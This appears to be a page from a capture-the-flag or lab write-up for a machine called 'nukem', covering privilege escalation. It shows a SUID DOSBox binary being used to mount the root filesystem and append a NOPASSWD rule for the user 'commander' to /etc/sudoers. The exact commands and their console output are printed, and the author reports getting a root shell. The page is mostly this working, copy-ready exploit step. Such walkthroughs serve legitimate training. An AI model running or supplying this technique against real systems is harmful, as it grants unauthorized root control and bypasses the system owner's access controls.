> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/nukem/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/nukem/priv-escalation.md).

# Priv Escalation

### DosBox SUID&#x20;

![](/files/zvVYxrRqT6RpGn51urMk)

So according to:

{% embed url="<https://gtfobins.github.io/gtfobins/dosbox/>" %}

Dosbox can mount a share and then write it, therefore if we export an enviromental variable with a file we would want to write on, and we can write as root we have many ways to escalate privileges.&#x20;

```
[commander@nukem ~]$ export LFILE='/etc/sudoers'
[commander@nukem ~]$ dosbox -c 'mount c /' -c "echo commander ALL=(root) NOPASSWD: ALL >>c:$LFILE"
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG:Loading primary settings from config file /home/commander/.dosbox/dosbox-0.74-3.conf
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/sudoers
```

I edited the sudoers file to allow my user to execute commands as root. I simply was able to spawn a shell as root.

![](/files/gcYKtBonEqmEeuD9HQq9)
